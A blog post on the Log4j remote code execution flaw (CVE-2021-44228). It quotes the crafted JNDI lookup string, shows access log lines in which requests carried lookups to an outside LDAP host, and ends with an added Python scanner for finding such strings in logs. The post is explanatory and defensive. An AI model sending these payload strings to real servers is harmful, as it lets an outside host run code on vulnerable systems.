Log4j: The Worst Vulnerability In Nearly A Decade?
A Last Legacy of Problems?
And so, in this most difficult of times, we have another Heartbleed. Well, not nearly as bad as Heartbleed, but certainly one of the most significant vulnerabilities we have seen in nearly a decade. We must be careful not to over-hype it, as it is nowhere near as bad as Heartbleed (which exposed the running memory of Web servers, including sensitive data such as passwords and encryption keys).
It is, of course, Log4j, a Java-based logging utility from Apache. The vulnerability (CVE-2021-44228) allows remote code execution and is triggered by a crafted string. It has since gained the maximum severity level of 10 (‘a perfect 10’ … just like Heartbleed).
The focus of the attack is a specially crafted string contained in a web server request:
${jndi:ldap://[targetsite]/file}
On the 11th December 2021, my site received these (I have removed the IP address and replaced it with X.X.X.X):
2021-12-11 18:10:12 10.0.0.7 GET / - 443 - X.X.X.X ${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent} 301 0 0 246
2021-12-11 19:47:25 10.0.0.7 GET /${jndi:ldap:/http443path.kryptoslogic-cve-2021-44228.com/http443path} - 443 - X.X.X.X…
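To find requests like these in your own access logs, the following is an added example (not code from the original article) that scans each line and reports which request field carried the lookup string and which host it pointed at. The field order is an assumption inferred from the two lines above, and the sample lines, IP addresses and example.test hosts are constructed.

```python
import re
from urllib.parse import unquote

# Field order assumed from the two log lines quoted on the page (IIS W3C style).
FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query",
          "port", "user", "c_ip", "user_agent", "status"]
# Matches ${jndi:<scheme>:/host and ://host; both slash forms occur on the page.
JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):/{1,2}(?P<host>[^/\s}:]+)", re.I)

def decode(value, rounds=3):
    """Percent-decode a bounded number of times so encoded braces are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return one finding per request field that carries a JNDI lookup."""
    parts = line.split()
    if line.startswith("#") or len(parts) < 5:   # header or unusable line
        return []
    record = dict(zip(FIELDS, parts))            # tolerates truncated lines
    findings = []
    for name in ("uri_stem", "uri_query", "user_agent"):
        match = JNDI.search(decode(record.get(name, "")))
        if match:
            findings.append({
                "when": f"{record['date']} {record['time']}",
                "client": record.get("c_ip", "?"), "field": name,
                "scheme": match["scheme"].lower(),
                "callback_host": match["host"].lower(),
            })
    return findings

def scan_log(text):
    return [f for line in text.splitlines() for f in scan_line(line)]

# Constructed sample lines (documentation IPs, example.test hosts; not real traffic).
SAMPLE = """\
#Fields: date time s-ip cs-method cs-uri-stem ...
2021-12-11 18:09:58 10.0.0.7 GET /index.html - 443 - 203.0.113.5 Mozilla/5.0 200 0 0 31
2021-12-11 18:10:12 10.0.0.7 GET / - 443 - 203.0.113.5 ${jndi:ldap://ua.example.test/a} 301 0 0 246
2021-12-11 19:47:25 10.0.0.7 GET /${jndi:ldap:/path.example.test/b} - 443 - 203.0.113.9
2021-12-11 20:01:03 10.0.0.7 GET /x q=%24%7Bjndi:ldap://enc.example.test/c%7D 443 - 203.0.113.9 curl/7.79 404 0 0 15
"""

if __name__ == "__main__":
    print(*scan_log(SAMPLE), sep="\n")
```

A hit here only shows that a lookup string reached the web server; whether anything behind it passed that string to a vulnerable Log4j instance has to be checked separately.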